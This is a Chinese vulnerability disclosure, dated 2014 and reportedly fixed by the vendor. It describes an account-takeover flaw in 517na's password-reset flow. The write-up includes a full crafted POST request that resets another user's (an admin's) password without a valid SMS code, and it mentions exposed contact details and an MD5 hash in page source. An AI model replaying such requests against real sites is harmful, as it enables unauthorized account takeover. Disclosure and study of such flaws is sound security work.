漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经确认,细节仅向厂商公开
2014-11-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

呀,要毕业了,看到517na在校园招聘,去面试时,前台漂亮MM给我倒了一杯茶,面试官迟迟不来,于是...

详细说明:

我先注册了一个自己的账号,然后按照找回密码的正常流程走了一遍。猜测可能存在逻辑绕过:
然后我从主站fuzz到一个账号为qingxia,点击找回密码,

1.jpg


咦,打了马赛克!!右键查看源代码里发现有详细的手机号和邮箱。。(马赛克你是在逗我吗!)

2.jpg


在找回密码处点击获取验证码后,随便输入一个6位数(此处无需短信验证码正确与否),点下一步。
然后直接提交如下post包修改密码。(此数据包为我的账号用正常流程抓取到的第三步设置新密码的数据包)
注意:需修改ASP.NET_SessionId为当前sessionid,staffID修改为要重置密码的用户名qingxia

POST /FindPassword/ChangePsw HTTP/1.1
Host: user.517na.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://user.517na.com/FindPassword/ComfirmNewPwd?UserID=xjcjinmao&R=353730&D=2014-07-11%2022:05:23&Sign=C8690DB5B5240F7702755E8F8859622F
Content-Length: 31
Cookie: ASP.NET_SessionId=zvxqzk22ejubrmmk40hxr05e
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
password=123123&staffID=qingxia


3.jpg


返回OK!!!
尝试用qingxia 123123登录,成功进入后台,发现是一个票务分销商的账号:

4.jpg


查看源代码把我惊呆了,密码的md5清晰的写在了里面:

5.jpg


还是一个管理员账号:

6.jpg


就在此时,终于等到面试官叫我进去面试了,然后就没有然后了。。。

漏洞证明:

3.jpg


4.jpg


6.jpg

修复方案:

听说贵公司安全是运维在做。。。

标签: none

评论已关闭